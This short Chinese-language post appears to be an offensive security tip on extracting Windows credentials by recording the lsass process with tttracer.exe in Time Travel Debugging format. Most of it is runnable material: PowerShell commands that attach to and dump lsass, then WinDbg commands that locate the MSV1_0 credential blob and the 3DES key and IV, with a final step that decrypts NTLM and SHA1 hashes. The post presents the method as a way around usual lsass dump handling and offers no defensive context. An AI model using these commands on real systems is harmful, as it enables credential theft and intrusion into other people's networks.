Lsass dump is dead, long live Lsass Time Travel!

分享一个小tips，利用tttracer.exe进行lsass转储，转储成Time Travel Debugging格式,思路来源:https://twitter.com/n_o_t_h_a_n_k_s/status/1559620227586875392

首先新建两个管理员权限的powershell终端，分别运行:

tttracer -dumpfull -attach (Get-Process lsass | Select -expand id)

tttracer -stop (Get-Process lsass | Select -expand id)

然后将得到的.run文件放入WinDbg Preview.

懒得本地再装WinDbg Preview.了直接用作者的图

然后运行下面的指令得到MSV1_0 blob区域

db poi(poi(poi(poi(lsasrv!LogonSessionList))+0x108)+0x10)+0x28+0x8 L0x1b0

然后运行下面的指令拿到3des的key和iv

db lsasrv!InitializationVector L8

db poi(poi(lsasrv!h3DesKey)+0x10)+0x38+4 L0x18

最后就是用key和iv去解密blob拿到ntlm、sha1

注意该方法dump的文件mimikatz无法解密，不同版本偏移不同所以windbg命令也不相同